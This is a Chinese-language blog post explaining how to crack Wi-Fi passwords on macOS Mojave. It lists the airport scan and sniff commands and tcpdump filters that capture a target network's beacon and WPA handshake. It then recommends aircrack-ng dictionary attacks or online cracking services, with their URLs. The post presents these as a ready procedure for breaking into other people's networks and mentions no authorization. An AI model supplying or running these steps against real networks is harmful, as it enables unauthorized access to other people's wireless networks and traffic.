macOS Wi-Fi密码破解抓包方法

注意:本文针对的是 macOS Mojave 不是该系统可能会有些出入。

我们破解 Wi-Fi 密码最好的方法就是先抓 cap 包,然后在使用 aircrack-ng 这种工具去跑字典,暴力破解,成功率主要是看字典强不强大。当然还有其他的方法像跑PIN这种,主要看你的网卡和对方的路由设备,如果对方关了PIN功能就没法用这种方法这里不去探讨。

macOS 自身带了一个非常的好用的 airport 工具。

安装命令

sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/sbin/airport

如果你使用的是 macOS Mojave 系统,可能会收到操作不允许的提示,好像是内核保护什么鬼,网上有关闭方法,这里我也懒得折腾了,不安装快捷命令直接扫描。

扫描网卡

/System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport scan

扫描完成后你会得到类似如下结果

 SSID BSSID             RSSI CHANNEL HT CC SECURITY (auth/unicast/group)
 1007 dc:d7:13:b4:38:6c -68  6      Y  -- WPA(PSK/AES/AES) WPA2(PSK/AES/AES)

抓包

sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/A/Resources/airport sniff 6

注意:
1.sniff 后面的6要修改成你抓包的信道,可以看CHANNEL中的值。
2.比较操蛋的是该命令在 macOS Mojave 中会出现 Capturing 802.11 frames on en0. 的报错。什么原因目前不清楚,我在 Stack Overflow 看了一下,有人也在反应这个问题,好像是系统问题,以前的老系统就可以用。为了解决这个问题,airport sniff 可能不能用了,有人给出了更好的解决方案,使用 tcpdump 来抓包。

tcpdump 抓包

# capture a beacon frame from the AP
sudo tcpdump "type mgt subtype beacon and ether src $BSSID" -I -c 1 -i en1 -w beacon.cap
# wait for the WPA handshake
sudo tcpdump "ether proto 0x888e and ether host $BSSID" -I -U -vvv -i en1 -w handshake.cap

注意:把 $BSSID 改成你要抓的地址。

抓的包默认会保存在 /Users/username

拿到 .cap 文件就可以挂字典暴力破解了。
我这个人比较懒,不想在本地跑字典,也有很多在线网站可以实现。

推荐
https://gpuhash.me/
https://www.onlinehashcrack.com/wifi-wpa-rsna-psk-crack.php

参考:https://louisabraham.github.io/articles/WPA-wifi-cracking-MBP.html


标签: macOS Wi-Fi


添加新评论